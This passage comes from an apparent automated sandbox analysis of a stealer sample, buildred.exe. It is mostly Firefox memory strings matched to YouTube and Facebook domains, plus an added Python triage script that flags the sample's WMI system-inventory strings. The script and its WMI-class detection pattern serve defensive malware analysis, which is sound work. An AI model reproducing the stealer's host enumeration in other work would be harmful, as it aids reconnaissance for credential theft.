Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows? equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2708137723.000001E539280000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2751984387.000001E539282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsf equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.2855549826.00000130BDB54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2760124251.000001E539530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsfz equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevationN equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account< equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"winsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\DefaultH equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: JSON Viewer's onSave failed in startPersistenceFailed to listen. Callback argument missing.devtools.performance.popup.feature-flagdevtools/client/framework/devtools-browserdevtools.debugger.features.javascript-tracing{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Failed to execute WebChannel callback:No callback set for this channel.and deploy previews URLs are allowed.WebChannel/this._originCheckCallbackresource://devtools/shared/security/socket.js@mozilla.org/network/protocol;1?name=default@mozilla.org/network/protocol;1?name=file@mozilla.org/uriloader/handler-service;1browser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNamesdevtools-commandkey-javascript-tracing-toggleGot invalid request to save JSON datadevtools/client/framework/devtoolsreleaseDistinctSystemPrincipalLoaderUnable to start devtools server on devtools-commandkey-profiler-capture@mozilla.org/dom/slow-script-debug;1DevTools telemetry entry point failed: Failed to listen. Listener already attached.browser and that URL. Falling back to ^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$DevToolsStartup.jsm:handleDebuggerFlagdevtools.debugger.remote-websocketdevtools-commandkey-profiler-start-stopdevtools.performance.recording.ui-base-urlresource://devtools/server/devtools-server.jsgecko.handlerService.defaultHandlersVersionhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%shttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/DeferredTask.sys.mjs_injectDefaultProtocolHandlersIfNeededresource://gre/modules/FileUtils.sys.mjs^([a-z+.-]+:\/{0,3})*([^\/@]+@).+^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?resource://gre/modules/NetUtil.sys.mjshttps://mail.yahoo.co.jp/compose/?To=%s{33d75835-722f-42c0-89cc-44f328e56a86}http://win.mail.ru/cgi-bin/sentmsg?mailto=%sbrowser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAG_FORCE_ALTERNATE_URIhttps://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%sget FIXUP_FLAGS_MAKE_ALTERNATE_URICan't invoke URIFixup in the content processresource://gre/modules/FileUtils.sys.mjs^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)extractScheme/fixupChangedProtocol<isDownloadsImprovementsAlreadyMigratedhandlerSvc fillHandlerInfo: don't know this typeScheme should be either http or https{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/JSONFile.sys.mjs@mozilla.org/network/file-input-stream;1_finalizeInternal/this._finalizePromise<resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjs@mozilla.org/network/async-stream-copier;1Must have a source and a callbacknewChannel requires a single object argumentFirst argument should be an nsIInputStreamresource://gre/modules/JSONFile.sys.mjs@mozilla.org/network/input-stream-pump;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLNon-zero amoun
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account6 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.2851889197.00000130BD7D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account> equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountx equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: PREF_BRANCH_PREVIOUS_ACTIONVALIDATE_FORCE_APPEND_EXTENSION_downloadTypesViewableInternallyshouldViewDownloadInternally_shouldViewDownloadInternally_shouldViewDownloadInternally/<getCombined/overrideFnArray<https://www.youtube.com/accountVALIDATE_GUESS_FROM_EXTENSIONpictureinpicture@mozilla.org equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2760124251.000001E539530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: URL=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: URL=https://www.youtube.com/accountj equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2956306224.000000000854C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Win32_Process7440Win32_Processfirefox.exefirefox.exefirefox.exeWin32_ComputerSystemuser-PCWin32_OperatingSystem10.0.19045Microsoft Windows 10 Pro|C:\Windows|\Device\Harddisk0\Partition320240726165726.463452+060C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
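Nearly every row in this block comes from the firefox.exe instances the sample launched (process indices 00000021, 00000027, 00000028 and 0000002F) and is the browser's own environment block, command line, devtools string table or Enhanced Tracking Protection shim list happening to contain www.youtube.com or www.facebook.com. The one row that matters for the verdict is the buildred.exe hit directly above: it carries the Win32_Process, Win32_ComputerSystem and Win32_OperatingSystem inventory that the stealer collected through WMI, including the full firefox.exe command line it observed. The Python script below is an added triage example, not part of the report or of any sandbox vendor's tooling: it parses rows in this exact format, groups them by the process whose memory matched, separates environment-block noise from WMI inventory strings, and flags hits in anything other than the launched browser. It assumes that the first dotted field of a dump name is the per-process instance index (consistent with every row on this page) and uses a threshold of five NAME= tokens, chosen for the example, to recognise a dumped environment block; the sample rows are constructed from the report's own entries, shortened where noted.

```python
import re
from dataclasses import dataclass

# Row format of the report's "String found in binary or memory" entries.
HIT_RE = re.compile(
    r"^Source: (?P<sources>.+?) String found in binary or memory: "
    r"(?P<string>.*) equals (?P<domain>\S+) \((?P<label>[^)]+)\)$"
)
# One "<process>, <dump>.sdmp" pair per matched memory region; rows may list several.
SOURCE_RE = re.compile(r"(?P<proc>[^,\s]+), (?P<dump>[0-9A-Fa-f.]+\.sdmp)")
# WMI classes the report itself names (signature list and the buildred.exe row).
WMI_CLASS_RE = re.compile(
    r"Win32_(?:Process|ComputerSystem|OperatingSystem|DiskDrive|VideoController)"
)
# NAME= tokens; a dumped environment block is a long run of them with no separator.
ENV_VAR_RE = re.compile(r"[A-Z][A-Z0-9_]*=")
ENV_BLOCK_MIN_VARS = 5  # heuristic threshold chosen for this example


@dataclass
class Hit:
    sources: list       # (process name, process index) for every matched dump
    string: str         # matched string exactly as the report prints it
    domain: str         # domain the sandbox matched the string against
    label: str          # the sandbox's label for that domain
    wmi_classes: list   # WMI class names embedded in the string
    is_env_block: bool  # string looks like a dumped process environment block


def parse_hit(line):
    """Parse one report row; return None for a line that is not such a row."""
    m = HIT_RE.match(line.strip())
    if m is None:
        return None
    # Assumption: the first dotted field of a dump name is the per-process index.
    sources = [(s["proc"], s["dump"].split(".")[0])
               for s in SOURCE_RE.finditer(m["sources"])]
    string = m["string"]
    return Hit(sources, string, m["domain"], m["label"],
               sorted(set(WMI_CLASS_RE.findall(string))),
               len(ENV_VAR_RE.findall(string)) >= ENV_BLOCK_MIN_VARS)


def triage(lines, browser_processes=("firefox.exe", "chrome.exe", "msedge.exe")):
    """Group rows by source process and flag those that deserve a second look."""
    per_proc = {}
    for line in lines:
        hit = parse_hit(line)
        if hit is None:
            continue
        for proc in sorted({p for p, _ in hit.sources}):
            e = per_proc.setdefault(proc, {
                "hits": 0, "env_block_hits": 0, "domains": set(),
                "process_indices": set(), "wmi_classes": set(), "review": False})
            e["hits"] += 1
            e["env_block_hits"] += int(hit.is_env_block)
            e["domains"].add(hit.domain)
            e["process_indices"].update(i for p, i in hit.sources if p == proc)
            e["wmi_classes"].update(hit.wmi_classes)
            # A WMI inventory string in anything other than the launched browser
            # is the sample's own enumeration, not browser noise.
            if proc not in browser_processes and hit.wmi_classes:
                e["review"] = True
    for e in per_proc.values():  # sets -> sorted lists for deterministic output
        for key in ("domains", "process_indices", "wmi_classes"):
            e[key] = sorted(e[key])
    return per_proc


def rows_to_review(summary):
    """Names of the processes whose hits were flagged, in a stable order."""
    return sorted(p for p, e in summary.items() if e["review"])


# Constructed sample input in the report's row format: three firefox.exe rows (a
# command line, a URL fragment, an environment block cut down to a handful of
# variables) and the buildred.exe WMI inventory row, also shortened.
SAMPLE_HITS = [
    "Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004"
    ".00000020.00020000.00000000.sdmp String found in binary or memory: "
    r"C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account"
    " equals www.youtube.com (Youtube)",
    "Source: firefox.exe, 00000028.00000002.2919430058.0000026193B3A000.00000004"
    ".00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919430058"
    ".0000026193BAA000.00000004.00000800.00020000.00000000.sdmp String found in "
    "binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)",
    "Source: firefox.exe, 00000028.00000003.2751223783.00000261842EB000.00000004"
    ".00000020.00020000.00000000.sdmp String found in binary or memory: "
    r"=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roaming"
    r"COMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exe"
    "MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account"
    r"USERNAME=userUSERPROFILE=C:\Users\user equals www.youtube.com (Youtube)",
    "Source: buildred.exe, 0000001A.00000002.2956306224.000000000854C000.00000004"
    ".00000020.00020000.00000000.sdmp String found in binary or memory: "
    "Win32_Process7440Win32_Processfirefox.exefirefox.exefirefox.exe"
    "Win32_ComputerSystemuser-PCWin32_OperatingSystem10.0.19045"
    r'Microsoft Windows 10 Pro|C:\Windows|\Device\Harddisk0\Partition3'
    r'"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"'
    " equals www.youtube.com (Youtube)",
]

if __name__ == "__main__":
    for proc, e in sorted(triage(SAMPLE_HITS).items()):
        flag = "REVIEW" if e["review"] else "ok"
        print(f"{proc:13} hits={e['hits']} env_blocks={e['env_block_hits']} "
              f"domains={e['domains']} wmi={e['wmi_classes']} [{flag}]")
```

Run against the full report, the script collapses the dozens of firefox.exe rows into one line per browser process index and leaves buildred.exe as the only entry marked for review, which is the same conclusion a manual read of this block reaches: the domain matches are side effects of the browser the sample spawned, while the WMI inventory string is the stealer's own activity. The browser allow-list and the five-token threshold are the two knobs to adjust for another sample.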
Source: firefox.exe, 00000028.00000002.2922562667.0000026194612000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", 